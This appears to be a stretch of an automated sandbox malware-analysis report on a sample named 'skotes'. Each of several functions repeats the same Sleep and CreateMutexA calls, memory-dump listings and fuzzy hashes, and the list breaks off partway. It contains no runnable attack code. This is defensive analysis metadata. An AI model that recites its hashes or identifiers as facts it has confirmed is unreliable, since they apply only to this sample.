Instruction Fuzzy Hash: 9E314D31B142449FFB08DB78DC897ADB7B6DFD6314F248218E068973D6C77599808791

Function 00909F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 1dc3152c468b6069e1e3a50c08a65dcd5b97fb3bec851f99995aeae070c3b820
Instruction ID: 9ad361ee56c3091bd5d6c9d220c875f51dc71022d2f4c8f6716c925253f0849d
Opcode Fuzzy Hash: 1dc3152c468b6069e1e3a50c08a65dcd5b97fb3bec851f99995aeae070c3b820
Instruction Fuzzy Hash: 963124317142459FEB18DB68DC887ADB776EFC6314F248618E028EB3D1C77599808B92

Function 0090A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: a2612e608f38c39ded3899cb21da34986822436cc0362a4327076ca8567befbb
Instruction ID: f313ec8b09ac36994f77056377988594ab0530dc07d02ebf1dc5c25c304529b7
Opcode Fuzzy Hash: a2612e608f38c39ded3899cb21da34986822436cc0362a4327076ca8567befbb
Instruction Fuzzy Hash: 773146317183449FEB08DB78CC89BADB776DFC2318F248218E028977D1C77699808B92

Function 0090A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: a08742222719cbe041ae39aa3434ec2f22f6be3f3ec2f4fbda4998ee33b1ed47
Instruction ID: eb08a26fe7cb9e9bc448de24edfaac3dd1498165ebfc143e6edc622097bd29cf
Opcode Fuzzy Hash: a08742222719cbe041ae39aa3434ec2f22f6be3f3ec2f4fbda4998ee33b1ed47
Instruction Fuzzy Hash: 393126317143459FEB08DB6CDC89BADB776AFC6314F248218E024973D1C77699808792

Function 0090A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: aa8375b9466880d8d6436f3cea9e2f3b565200a4be8684e67c1b7a94a9ac8927
Instruction ID: 0b221b56b6adf0dd957a3f91b781f143336192ace97c71df356481b78fe20798
Opcode Fuzzy Hash: aa8375b9466880d8d6436f3cea9e2f3b565200a4be8684e67c1b7a94a9ac8927
Instruction Fuzzy Hash: 70311731B142449FEB089B78DC8DBADB676EFD1318F248218E064973D5D7B599808A92

Function 0090A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: c60e499b2b874b56d091d60607bf7e75cb59199b3cc8d87df21ff073c1afe8d9
Instruction ID: 6683df5c84ad713a5954aab96c04cc4952c09c478b96b909ba0baa975610b453
Opcode Fuzzy Hash: c60e499b2b874b56d091d60607bf7e75cb59199b3cc8d87df21ff073c1afe8d9
Instruction Fuzzy Hash: D13148317143059FEB08DB78DC89BADB776EFC5318F248618E4249B3D1CB7599808B92

Function 0090A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
